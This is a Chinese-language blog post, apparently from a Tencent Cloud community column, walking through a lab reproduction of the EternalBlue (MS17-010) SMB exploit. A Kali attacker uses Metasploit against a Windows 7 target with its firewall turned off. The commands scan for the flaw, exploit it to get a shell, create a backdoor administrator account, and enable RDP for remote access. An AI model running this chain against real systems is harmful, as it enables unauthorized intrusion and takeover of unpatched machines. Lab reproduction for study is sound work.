首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >利用永恒之蓝(MS17010)漏洞攻击靶机

利用永恒之蓝(MS17010)漏洞攻击靶机

作者头像
777nx
发布2023-10-18 15:13:49
发布2023-10-18 15:13:49
1.3K0
举报

参考:利用永恒之蓝(MS17010)漏洞攻击靶机

MS17010漏洞复现和利用

相关环境

攻击机:Kali-linux 2023.2a 靶机:Windows 7 SP1旗舰版

获取靶机IP地址

打开cmd查看ip地址

代码语言:javascript
复制
ipconfig

关闭防火墙,检查通讯状态

需要关闭靶机的防火墙

打开网络和共享中心

进入windows防火墙设置

成功关闭防火墙

检查通讯状况

在kali linux里

代码语言:javascript
复制
ping 192.168.137.130

在windows 7里

代码语言:javascript
复制
ping 192.168.137.128

两边都ping得通,说明通讯正常

攻击步骤

检查是否存在漏洞

运行postgresql数据库

代码语言:javascript
复制
service postgresql start

打开msf

代码语言:javascript
复制
msfconsole

使用相关模块

代码语言:javascript
复制
use  auxiliary/scanner/smb/smb_ms17_010

查看相关配置信息

代码语言:javascript
复制
show options

设置目标IP为靶机的IP

代码语言:javascript
复制
set rhost 192.168.137.130

开始对靶机进行扫描

代码语言:javascript
复制
run 
发现漏洞并攻击

搜索msf17010漏洞模块

代码语言:javascript
复制
search ms17-010

使用该漏洞模块进行攻击

代码语言:javascript
复制
use exploit/windows/smb/ms17_010_eternalblue 

查看其配置详情

代码语言:javascript
复制
show options

设置靶机IP

代码语言:javascript
复制
set rhost 192.168.137.130

使用exploit或者run命令进行攻击

代码语言:javascript
复制
exploit

获取shell

代码语言:javascript
复制
shell
利用漏洞提权

创建管理员账户

代码语言:javascript
复制
net user pigpig 123456 /add

我们在win7那边已经可以看到了

增加管理员权限

代码语言:javascript
复制
net localgroup administrators pigpig /add

在去win7那边观察

开启3389端口并远程访问控制

将win7靶机那边远程服务打开

代码语言:javascript
复制
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

打开3389端口之后,在新的shell里

代码语言:javascript
复制
rdesktop 192.168.137.130:3389

点击yes之后,就可以在kali里面进入到win7靶机了。

输入账户密码回车,点了同意靶机的管理员账户就会掉线

成功进入了

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-08-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • MS17010漏洞复现和利用
    • 相关环境
    • 获取靶机IP地址
    • 关闭防火墙,检查通讯状态
      • 需要关闭靶机的防火墙
      • 检查通讯状况
    • 攻击步骤
      • 检查是否存在漏洞
      • 发现漏洞并攻击
      • 利用漏洞提权
      • 开启3389端口并远程访问控制
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档